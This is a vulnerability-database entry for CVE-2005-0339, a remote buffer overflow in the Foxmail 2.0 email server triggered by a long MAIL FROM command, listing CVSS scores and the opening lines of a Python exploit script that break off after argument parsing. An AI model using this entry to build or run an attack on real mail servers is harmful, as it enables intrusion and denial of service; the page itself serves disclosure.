10
CVSSv2

CVE-2005-0339

Published: 02/05/2005 Updated: 11/07/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in Foxmail 2.0 allows remote malicious users to cause a denial of service and possibly execute arbitrary code via a long MAIL FROM command.

Vulnerable Product Search on Vulmon Subscribe to Product

foxmail foxmail email server 2.0

Exploits

#!/usr/bin/python #Code by OYXin #oyxin_at_segfaultcn import socket import sys import getopt def usage(): print "Usage: foxserverpy -h host -p port" sysexit(0) if __name__ == '__main__': try: opts, args = getoptgetopt(sysargv[1:], "h:p:") except getoptGetoptError, msg: print msg usage() ...